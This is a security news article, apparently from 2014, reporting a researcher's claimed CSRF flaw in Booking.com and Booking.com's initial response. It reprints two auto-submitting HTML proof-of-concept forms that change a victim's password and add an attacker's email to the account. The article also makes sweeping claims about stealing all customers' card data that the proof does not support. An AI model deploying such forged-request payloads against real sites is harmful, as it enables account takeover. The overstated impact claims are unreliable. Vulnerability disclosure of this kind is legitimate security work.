Booking.com vulnerable to CSRF Attack leading to account hijack and stealing of customer details

Booking.com vulnerable to CSRF attack

Mohamed M.Fouad, a independent security researcher from Egypt has discovered serious flaws in the Amsterdam, Netherlands based renting accommodation provider Booking.Com.  Mohamed who has proven track record in field of security research and vulnerability pentesting has been acknowledged by top tech firms like Microsoft, Oracle, Yahoo, eBay, Sony, AT&T, Huawei, DropCam, Bitcasa, Get Pocket, Splitwise etc.

Mohamed while researching the Booking.Com website found that it is vulnerable to CSRF attack which can lead to account hijacking via change victim password.  A potential hacker can also view the  email ids or credit cards/debit card information of all booking.com customers.  The hacker can also mark the potential victim’s account for deletion

Mohamed says all this can be done just via one-click malicious URL.   The  CSRF attack can also be mounted through by adding review /comment on Booking.Com website.  If an attacker posts his/her rate review on Booking.Com with malicious URL, the hacker  can the change victims account password and this way he can deface all the entire Booking.com website, but not before stealing the entire personal information and payment cards details from Booking.com website.

About Booking.Com

Booking.com is an online booking website established in 1996, based in Amsterdam, Netherlands and since 2005 owned and operated by NASDAQ listed Priceline. Booking.com offers online accommodation booking. It has over 540,000 properties globally under contract and deals with more than 650,000 room nights reservations per day.   Booking.com is available in more than 41 languages. Priceline, the holding company has  reported 2013 fourth quarter revenue of $1.54 billion.  It increased its accommodation bookings for the quarter by 38.8% to $9.1 billion and was particularly helped by the company’s international operations, which saw bookings increase 41.9% to $1.3 billion.

What is CSRF vulnerability

Cross-site request forgery or CSRF aka sea-surf or XSRF, which is also known as a one-click attack or session riding, is a type of malicious exploit of a website whereby unauthorized commands are transmitted from a user that the website trusts. Unlike cross-site scripting (XSS), which exploits the trust a user has for a particular site, CSRF exploits the trust that a site has in a user’s browser.  Mohamed has said that the one-click bait works on Booking.Com quite well and the security team of Booking.com seem to be oblivious of the fact.

Proof of Concept (PoC)

Mohamed has given the entire POC on his website, which is being reprinted here with his approval

Note: You will see here each request to do something in booking.com depends on “op” Parameter with action name value (ex:changepw,add_email,delete_account) without token exists.Booking.com have a lot if vulnerabilities but the most critical one you can change user password via CSRF Attack.

Below is the Critical one !!!!

=============================
Change Password CSRF Request :
==============================
<html>
<body onload=”document.csrf.submit()”>
<formaction=”https://secure.booking.com/login.en-us.html?aid=304142;sid=84a359da3688960a9a914a5198ce9929;dcid=2;tmpl=profile/myaccount”
method=”post” name=”csrf” “>
<input type=”hidden” name=”op” value=”changepw”><br>
<input type=”hidden” name=”lang” value=”en-us”><br>
<input type=”hidden” name=”username” value=””><br>
<input type=”hidden” name=”reset_hash” value=””><br>
<input type=”hidden” name=”error_url” value=””><br>
<input type=”hidden” name=”password” value=”hacked@2014″><br>
<input type=”hidden” name=”password_confirm” value=”hacked@2014″><br>
</form>
</body>
</html>
==============================
Add Email CSRF Request :
================================
<html>
<body onload=”document.csrf.submit()”>
<formaction=”https://secure.booking.com/login.en-us.html?aid=304142;sid=84a359da3688960a9a914a5198ce9929;dcid=2;tmpl=profile/myaccount”
method=”post” name=”csrf”>
<input type=”hidden” name=”op” value=”add_email”><br>
<input type=”hidden” name=”email” value=”hacker@hotmail.com”><br>
<input type=”hidden” name=”lang” value=”en-us”><br>
</form>
</body>
</html>

Video of the PoC

Booking.Com reaction

Mohamed informed Booking.Com of the vulnerability present on their website but surprisingly they have not replied to him as of yet.  We are awaiting Booking.Com’s reply to this vulnerability which can put its millions of customer data at risk.

Resource : Mohamed M. Fauod’s Blog

UPDATE # We received a reply from Booking.Com in which they said that their security personnel are looking into the matter.

1 COMMENT

LEAVE A REPLY

Please enter your comment!
Please enter your name here